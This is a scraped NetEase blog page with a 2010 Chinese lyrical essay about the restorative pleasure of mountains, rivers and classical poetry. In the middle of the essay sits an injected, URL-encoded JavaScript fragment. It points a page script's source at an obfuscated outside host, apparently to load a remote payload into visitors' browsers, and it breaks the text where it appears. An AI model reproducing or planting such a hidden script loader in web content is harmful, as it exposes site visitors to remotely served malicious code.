注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

天天蓝a

为草甘做兰,为木当作松,幽兰香飘远,松寒不改容。

 
 
 

日志

 
 

行走山水间  

2010-07-19 16:30:30|  分类: 讲述 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
 

“木欣欣以向荣,泉涓涓而始流。善万物之得时,感吾生之行休……”。

在炎炎夏季,烈日灼灼,倾听一下陶渊明的美文,面前便会浮现山涧中、戏水碧溪里,任山风河风徐徐穿过耳边,听泉水悠悠流过山谷,看浪花在你面前翻滚,这将是何等的清凉惬意啊!

忘情山水间的快意,虽是极乐极美的体验,然作为一个都市之人,我们成天游走在一个由钢筋混凝土构筑的格子间,久而久之,难免会感到生命的倦怠和浮躁。而人与人之间的冷漠和设防,无疑会令我们身心疲惫。
tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<   在这个时候,和山水亲密接触,既可以活络筋骨,也可以让一颗疲惫已久的心得到片刻休憩。要知道山山水水是天地万物中一种永恒的自然,人活在世上对于天地间这种自然置之不理和置之度外是办不到的,因为人是有情的。不管我们是活着也好,还是入土为安也好,我们始终如一的都溶于这山水这间,这是造物主无形的给予人类最丰厚的自然,我们无处可逃,因为“上天无门,下地无路。人生一世,草长一秋。”(古语)我们只能生存于这山山水水之间,不管是欢天喜地也罢,还是忧愁苦闷也罢!我们何不寄情于山水间探寻更多自己未知的世界。

或许,你会说工作忙没有时间纵情于山水,但每天我们迎来的朝阳、追逐的落日,投入的风景,你都可以诗意地行走呀。试想,仲夏的夜晚,熏风吹动着窗前的醉柳,捧一卷诗书,沏一杯清茗,在这树欲静而风轻的时刻,独坐一隅,静静地品读《唐诗三百首》,听巴山夜雨的倾诉,看“月落乌啼霜满天”的浓情;子夜琵琶的宫商角羽,三更瘦月的娥鬟广袖……蓦然间竟忘了今夕是何年。

山是秀丽的,水是柔美的。在喧嚣的尘世中,我甘愿与山水为伍,做一棵纯粹的芦苇,朝风而舞,向水而歌……

  评论这张
 
阅读(12)| 评论(2)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017